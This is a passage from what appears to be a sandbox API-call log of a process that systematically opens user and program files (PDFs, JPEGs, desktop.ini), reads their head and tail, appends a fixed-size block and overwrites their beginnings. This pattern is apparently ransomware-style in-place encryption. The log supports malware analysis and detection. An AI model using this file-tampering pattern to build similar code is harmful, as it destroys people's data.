lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11fb3 [0064.760] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.761] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0064.761] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.761] CloseHandle (hObject=0x1e8) returned 1 [0064.763] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0064.764] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.764] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x18efb [0064.764] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.764] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.764] ReleaseMutex (hMutex=0x168) returned 1 [0064.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0064.764] ReadFile (in: hFile=0x1e8, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.768] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17efb [0064.768] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.769] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17efb [0064.770] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.770] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0064.770] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.770] CloseHandle (hObject=0x1e8) returned 1 [0064.773] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0064.773] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.773] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x80f5 [0064.774] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.774] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.774] ReleaseMutex (hMutex=0x168) returned 1 [0064.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0064.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0064.774] ReadFile (in: hFile=0x1e8, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.776] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x70f5 [0064.776] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.776] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x70f5 [0064.777] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.777] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0064.777] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.777] CloseHandle (hObject=0x1e8) returned 1 [0064.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0065.187] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.187] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x432 [0065.187] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.187] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.187] ReleaseMutex (hMutex=0x168) returned 1 [0065.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.jpg", lpUsedDefaultChar=0x0) returned 9 [0065.187] ReadFile (in: hFile=0x1e8, lpBuffer=0x269c668, nNumberOfBytesToRead=0x432, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2d5f2bc*=0x432, lpOverlapped=0x0) returned 1 [0065.194] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0065.194] WriteFile (in: hFile=0x1e8, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ba, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x9ba, lpOverlapped=0x0) returned 1 [0065.194] CloseHandle (hObject=0x1e8) returned 1 [0065.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0065.208] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.208] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2949 [0065.209] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.209] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.209] ReleaseMutex (hMutex=0x168) returned 1 [0065.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SoftBlue.jpg", lpUsedDefaultChar=0x0) returned 12 [0065.209] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.211] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1949 [0065.211] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.212] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1949 [0065.212] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.212] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0065.212] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.212] CloseHandle (hObject=0x1e8) returned 1 [0065.214] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0065.215] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.215] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1906 [0065.215] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.215] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.216] ReleaseMutex (hMutex=0x168) returned 1 [0065.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0065.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GreenBubbles.jpg", lpUsedDefaultChar=0x0) returned 16 [0065.216] ReadFile (in: hFile=0x1e8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1906, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f2bc*=0x1906, lpOverlapped=0x0) returned 1 [0065.218] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0065.218] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1e8e, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1e8e, lpOverlapped=0x0) returned 1 [0065.219] CloseHandle (hObject=0x1e8) returned 1 [0065.222] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0065.224] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.224] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd6b22 [0065.225] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.225] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.225] ReleaseMutex (hMutex=0x168) returned 1 [0065.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrysanthemum.jpg", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0065.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrysanthemum.jpg", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chrysanthemum.jpg", lpUsedDefaultChar=0x0) returned 17 [0065.225] ReadFile (in: hFile=0x1e8, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.228] ReadFile (in: hFile=0x1e8, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.230] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xd5b22 [0065.230] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.232] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xd5b22 [0065.233] WriteFile (in: hFile=0x1e8, lpBuffer=0x2864d58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864d58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.234] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0065.234] WriteFile (in: hFile=0x1e8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0065.234] WriteFile (in: hFile=0x1e8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.234] CloseHandle (hObject=0x1e8) returned 1 [0065.529] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0065.534] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.534] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xae [0065.534] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.534] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.534] ReleaseMutex (hMutex=0x168) returned 1 [0065.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0065.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0065.555] ReadFile (in: hFile=0x1e8, lpBuffer=0x1f39b58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39b58*, lpNumberOfBytesRead=0x2d5f2bc*=0xae, lpOverlapped=0x0) returned 1 [0065.557] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0065.557] WriteFile (in: hFile=0x1e8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x636, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x636, lpOverlapped=0x0) returned 1 [0065.557] CloseHandle (hObject=0x1e8) returned 1 [0065.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.789] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.790] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x745e [0065.790] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0065.790] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.790] ReleaseMutex (hMutex=0x168) returned 1 [0065.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sybase.xsl", lpUsedDefaultChar=0x0) returned 10 [0065.790] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.811] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x645e [0065.811] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.812] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x645e [0065.812] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.812] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0065.812] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.813] CloseHandle (hObject=0x1dc) returned 1 [0065.816] CreateFileW 